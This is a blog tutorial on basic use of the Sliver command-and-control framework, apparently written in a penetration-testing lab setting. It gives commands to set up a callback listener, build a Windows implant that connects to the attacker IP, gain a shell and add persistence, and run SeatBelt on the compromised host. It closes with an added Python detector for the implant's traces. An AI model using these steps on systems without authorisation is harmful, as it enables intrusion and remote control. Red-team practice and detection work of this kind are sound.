Sliver C2 Basic Usage

JP-Sec
Apr 26, 2024

Introduction

Sliver is an open source, cross-platform command and control (C2) framework released in 2020 by BishopFox. Developed to provide a robust alternative to traditional penetration testing tools, Sliver C2 offers a suite of capabilities that supports dynamic interaction with compromised systems. It is built to evade detection and includes features such as multi-platform support, encrypted communications, and the ability to generate modular implants.

Download

In this post, I will use Kali Linux, but you can totally follow along if you use another Linux distro.

From their GitHub repository, they provide a one-liner to install Sliver:

$ curl https://sliver.sh/install | sudo bash

Confirm the installation was successful by running the command:

$ sliver 

If you have problems starting Sliver, you can restart it by running the command:

$ sudo systemctl restart sliver 

Then, try running Sliver again.

Usage

Today, we will cover only the basic usage of Sliver. If you want more details or advanced features, check their documentation.

Setting up the listener

Here, 10.10.14.16 is my attacker IP.

I created a listener on port 443. I recommend using common ports because there’s a better chance that the connection will be allowed by the firewall.

sliver > mtls --lport 443

You can verify that your listener is running:

sliver > jobs

Generating the Implant and using it

My target IP is 10.129.165.176.

In my scenario, I have a reverse shell on my target by exploiting a service, but I will use Sliver to add persistence.

First, I generate the implant; this will be an .exe file:

sliver > generate --mtls 10.10.14.16:443 --os Windows --arch 64 

Here you can see the implant is generated in my Desktop folder as SIGNIFICANT_SUSPENDERS.EXE.

I import SIGNIFICANT_SUSPENDERS.EXE into the target and run it.

I get a connection back to Sliver. By running sessions, I can see the information and the ID:

sliver > sessions

To interact with the implant use:

sliver > use <ID> 

You can get more information about the commands you can use by running the help command.

For example, the shell command will give you an interactive shell:

sliver (SIGNIFICANT_SUSPENDERS) > shell

You can run post-exploitation tools such as Rubeus, SeatBelt and many others. You can see more at https://sliver.sh/docs?name=Armory

I will demonstrate with SeatBelt:

sliver (SIGNIFICANT_SUSPENDERS) > armory install seatbelt

You can now use SeatBelt:

sliver (SIGNIFICANT_SUSPENDERS) > seatbelt -group=all
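
Seen from the defender's side, the implant run above leaves three signals that can be correlated in endpoint telemetry: the WORD_WORD file name, a launch path a user can write to, and an outbound connection to a bare IP on port 443. The following Python is an added example, not part of the original post; the events are constructed using Sysmon field names, and the directory list and the `svc` user are assumptions.

```python
import re
from pathlib import PureWindowsPath

# File name shape seen in the post (SIGNIFICANT_SUSPENDERS.EXE): WORD_WORD in upper case.
NAME_RE = re.compile(r"^[A-Z]{3,}_[A-Z]{3,}$")
# Assumption: directories a low-privileged user can normally write to.
USER_WRITABLE = ("\\users\\", "\\windows\\temp\\", "\\programdata\\")

# Constructed sample events with Sysmon field names
# (EventID 1 = process create, EventID 3 = network connect).
EVENTS = [
    {"EventID": 1, "ProcessGuid": "A1",
     "Image": r"C:\Users\svc\Desktop\SIGNIFICANT_SUSPENDERS.EXE"},
    {"EventID": 3, "ProcessGuid": "A1", "DestinationIp": "10.10.14.16",
     "DestinationPort": 443, "DestinationHostname": ""},
    {"EventID": 1, "ProcessGuid": "B2",
     "Image": r"C:\Program Files\Vendor\UPDATE_HELPER.exe"},
    {"EventID": 3, "ProcessGuid": "B2", "DestinationIp": "203.0.113.7",
     "DestinationPort": 443, "DestinationHostname": "updates.example.com"},
    {"EventID": 1, "ProcessGuid": "C3",
     "Image": r"C:\Users\svc\Downloads\setup.exe"},
    {"EventID": 3, "ProcessGuid": "C3", "DestinationIp": "198.51.100.9",
     "DestinationPort": 443, "DestinationHostname": ""},
]

def suspicious_name(image):
    """True when the executable's base name has the WORD_WORD.exe shape."""
    p = PureWindowsPath(image)
    return p.suffix.lower() == ".exe" and bool(NAME_RE.match(p.stem))

def find_candidates(events, port=443):
    """Return (image, destination) pairs for processes matching all three signals."""
    images = {e["ProcessGuid"]: e["Image"] for e in events if e["EventID"] == 1}
    hits = []
    for e in events:
        if e["EventID"] != 3 or e["DestinationPort"] != port:
            continue
        image = images.get(e["ProcessGuid"])
        if image is None:
            continue  # no process-create record to correlate with
        in_user_dir = any(d in image.lower() for d in USER_WRITABLE)
        if suspicious_name(image) and in_user_dir and not e["DestinationHostname"]:
            hits.append((image, f'{e["DestinationIp"]}:{e["DestinationPort"]}'))
    return hits

if __name__ == "__main__":
    for image, dst in find_candidates(EVENTS):
        print(f"review: {image} -> {dst}")
```

The file name is set when the implant is built, so treat the name pattern as one signal to combine with the others rather than a detection on its own.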
